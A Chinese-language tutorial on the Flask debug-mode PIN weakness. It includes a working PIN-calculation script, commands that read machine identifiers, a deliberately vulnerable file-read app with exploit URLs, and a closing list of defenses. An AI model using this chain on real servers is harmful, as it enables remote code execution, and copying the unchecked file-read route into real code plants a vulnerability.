Flask Debug PIN 安全漏洞分析与利用<\/h1>

漏洞概述<\/h2>
Flask 框架在 debug 模式下会生成一个 Debugger PIN 码，该 PIN 码由服务器的一些固定特征值生成。如果攻击者能够获取这些特征值（通过任意文件读取等漏洞），就可以计算出 PIN 码，进而在 debug 页面上执行任意 Python 代码，导致远程代码执行（RCE）。<\/p>

漏洞影响<\/h2>

影响版本<\/strong>：所有使用 debug 模式的 Flask 应用<\/li>

利用条件<\/strong>：

Flask 应用运行在 debug 模式<\/li>
攻击者能够获取生成 PIN 码所需的 6 个特征值（通常需要配合任意文件读取漏洞）<\/li>
应用存在可以触发 debug 页面的错误<\/li> <\/ul> <\/li> <\/ul>
漏洞原理<\/h2>
PIN 码生成机制<\/h3>
Flask 的 debug PIN 码由以下 6 个特征值生成：<\/p>

username<\/strong> - 启动 Flask 应用的用户名<\/li>
modname<\/strong> - 固定为 flask.app<\/code><\/li>
getattr(app, 'name<\/strong>', getattr(app.class<\/strong>, 'name<\/strong>'))<\/strong> - 固定为 Flask<\/code><\/li>
getattr(mod, 'file<\/strong>', None)<\/strong> - Flask 库中 app.py 的绝对路径<\/li>
uuid.getnode()<\/strong> - 服务器 MAC 地址的十进制表示<\/li>
get_machine_id()<\/strong> - 机器 ID（Linux 下通常为 \/etc\/machine-id<\/code> 或 \/proc\/sys\/kernel\/random\/boot_id<\/code> 的内容）<\/li> <\/ol> 生成算法<\/h3> 将上述 6 个特征值连接起来<\/li> 对每个特征值进行 MD5 哈希计算<\/li> 添加 b'cookiesalt'<\/code> 和 b'pinsalt'<\/code> 作为额外盐值<\/li> 从哈希结果中提取 9 位数字作为 PIN 码<\/li> 将 PIN 码格式化为 XXX-XXX-XXX<\/code> 的形式<\/li> <\/ol> 漏洞利用步骤<\/h2> 1. 获取必要的特征值<\/h3> 1.1 获取 username<\/h4> 通过错误页面泄露<\/li> 通过系统文件读取（如 \/etc\/passwd<\/code>）<\/li> <\/ul> 1.2 获取 modname 和 app name<\/h4> 这两个值通常是固定的：<\/p> modname: flask.app<\/code><\/li> app name: Flask<\/code><\/li> <\/ul> 1.3 获取 Flask 库路径<\/h4> 通过错误页面泄露<\/li> 通过尝试常见路径（如 \/usr\/local\/lib\/pythonX.X\/site-packages\/flask\/app.py<\/code>）<\/li> <\/ul> 1.4 获取 MAC 地址<\/h4> Linux 系统：<\/p> # 获取 MAC 地址的十六进制形式<\/span> <\/span><\/span>cat \/sys\/class\/net\/ens33\/address # 或 eth0<\/span> <\/span><\/span> <\/span><\/span># 转换为十进制<\/span> <\/span><\/span>echo $((<\/span>0<\/span>x$(<\/span>cat \/sys\/class\/net\/ens33\/address | tr -d ':'<\/span>)))<\/span> <\/span><\/span><\/code><\/pre>1.5 获取 machine-id<\/h4> Linux 系统：<\/p> cat \/etc\/machine-id <\/span><\/span># 或<\/span> <\/span><\/span>cat \/proc\/sys\/kernel\/random\/boot_id <\/span><\/span><\/code><\/pre>2. 计算 PIN 码<\/h3> 使用以下 Python 脚本计算 PIN 码：<\/p> import<\/span> hashlib <\/span><\/span>from<\/span> itertools import<\/span> chain <\/span><\/span> <\/span><\/span>probably_public_bits =<\/span> [ <\/span><\/span> 'username'<\/span>, # 当前用户名<\/span> <\/span><\/span> 'flask.app'<\/span>, # modname<\/span> <\/span><\/span> 'Flask'<\/span>, # getattr(app, '__name__', getattr(app.__class__, '__name__'))<\/span> <\/span><\/span> '\/path\/to\/flask\/app.py'<\/span> # getattr(mod, '__file__', None)<\/span> <\/span><\/span>] <\/span><\/span> <\/span><\/span>private_bits =<\/span> [ <\/span><\/span> 'mac_address_decimal'<\/span>, # str(uuid.getnode())<\/span> <\/span><\/span> 'machine_id'<\/span> # \/etc\/machine-id 或 \/proc\/sys\/kernel\/random\/boot_id<\/span> <\/span><\/span>] <\/span><\/span> <\/span><\/span>h =<\/span> hashlib.<\/span>md5() <\/span><\/span>for<\/span> bit in<\/span> chain(probably_public_bits, private_bits): <\/span><\/span> if<\/span> not<\/span> bit: <\/span><\/span> continue<\/span> <\/span><\/span> if<\/span> isinstance(bit, str): <\/span><\/span> bit =<\/span> bit.<\/span>encode('utf-8'<\/span>) <\/span><\/span> h.<\/span>update(bit) <\/span><\/span>h.<\/span>update(b<\/span>'cookiesalt'<\/span>) <\/span><\/span> <\/span><\/span>cookie_name =<\/span> '__wzd'<\/span> +<\/span> h.<\/span>hexdigest()[:20<\/span>] <\/span><\/span> <\/span><\/span>num =<\/span> None<\/span> <\/span><\/span>if<\/span> num is<\/span> None<\/span>: <\/span><\/span> h.<\/span>update(b<\/span>'pinsalt'<\/span>) <\/span><\/span> num =<\/span> ('<\/span>%09d<\/span>'<\/span> %<\/span> int(h.<\/span>hexdigest(), 16<\/span>))[:9<\/span>] <\/span><\/span> <\/span><\/span>rv =<\/span> None<\/span> <\/span><\/span>if<\/span> rv is<\/span> None<\/span>: <\/span><\/span> for<\/span> group_size in<\/span> 5<\/span>, 4<\/span>, 3<\/span>: <\/span><\/span> if<\/span> len(num) %<\/span> group_size ==<\/span> 0<\/span>: <\/span><\/span> rv =<\/span> '-'<\/span>.<\/span>join(num[x:x +<\/span> group_size].<\/span>rjust(group_size, '0'<\/span>) <\/span><\/span> for<\/span> x in<\/span> range(0<\/span>, len(num), group_size)) <\/span><\/span> break<\/span> <\/span><\/span> else<\/span>: <\/span><\/span> rv =<\/span> num <\/span><\/span> <\/span><\/span>print(rv) <\/span><\/span><\/code><\/pre>3. 利用 PIN 码执行代码<\/h3> 触发一个 Flask 错误页面（如访问不存在的路由或故意引发异常）<\/li> 在 debug 页面的控制台中输入计算出的 PIN 码<\/li> 成功验证后即可执行任意 Python 代码<\/li> <\/ol> 漏洞复现示例<\/h2> 1. 创建有漏洞的 Flask 应用<\/h3> # app.py<\/span> <\/span><\/span>from<\/span> flask import<\/span> Flask, request <\/span><\/span> <\/span><\/span>app =<\/span> Flask(__name__) <\/span><\/span> <\/span><\/span>@app<\/span>.<\/span>route("\/"<\/span>) <\/span><\/span>def<\/span> hello<\/span>(): <\/span><\/span> return<\/span> Hello['a'<\/span>] # 故意引发错误<\/span> <\/span><\/span> <\/span><\/span>@app<\/span>.<\/span>route("\/file"<\/span>) <\/span><\/span>def<\/span> file<\/span>(): <\/span><\/span> filename =<\/span> request.<\/span>args.<\/span>get('filename'<\/span>) <\/span><\/span> try<\/span>: <\/span><\/span> with<\/span> open(filename, 'r'<\/span>) as<\/span> f: <\/span><\/span> return<\/span> f.<\/span>read() <\/span><\/span> except<\/span>: <\/span><\/span> return<\/span> 'error'<\/span> <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>: <\/span><\/span> app.<\/span>run(host=<\/span>"0.0.0.0"<\/span>, port=<\/span>8080<\/span>, debug=<\/span>True<\/span>) <\/span><\/span><\/code><\/pre>2. 获取特征值<\/h3> 访问 http:\/\/localhost:8080\/file?filename=\/etc\/machine-id<\/code> 获取 machine-id<\/li> 访问 http:\/\/localhost:8080\/file?filename=\/sys\/class\/net\/ens33\/address<\/code> 获取 MAC 地址<\/li> 从错误页面获取用户名和 Flask 路径<\/li> <\/ol> 3. 计算并利用 PIN 码<\/h3> 使用获取的特征值运行上述 Python 脚本计算 PIN 码，然后在错误页面的控制台中输入。<\/p> 防御措施<\/h2> 生产环境禁用 debug 模式<\/strong>：<\/p> app.<\/span>run(debug=<\/span>False<\/span>) <\/span><\/span><\/code><\/pre><\/li> 使用环境变量设置复杂 PIN 码<\/strong>：<\/p> export WERKZEUG_DEBUG_PIN=<\/span>your-complex-pin <\/span><\/span><\/code><\/pre><\/li> 限制 debug 页面的访问<\/strong>：<\/p> 仅允许本地访问<\/li> 使用防火墙规则限制访问<\/li> <\/ul> <\/li> 定期更新 Flask 框架<\/strong>：关注安全更新<\/p> <\/li> 避免任意文件读取漏洞<\/strong>：严格校验文件读取操作的输入<\/p> <\/li> <\/ol> 总结<\/h2> Flask debug PIN 漏洞是一个严重的安全问题，它允许攻击者在获取特定系统信息后绕过安全限制执行任意代码。开发人员必须确保生产环境中禁用 debug 模式，并采取其他安全措施防止敏感信息泄露。<\/p>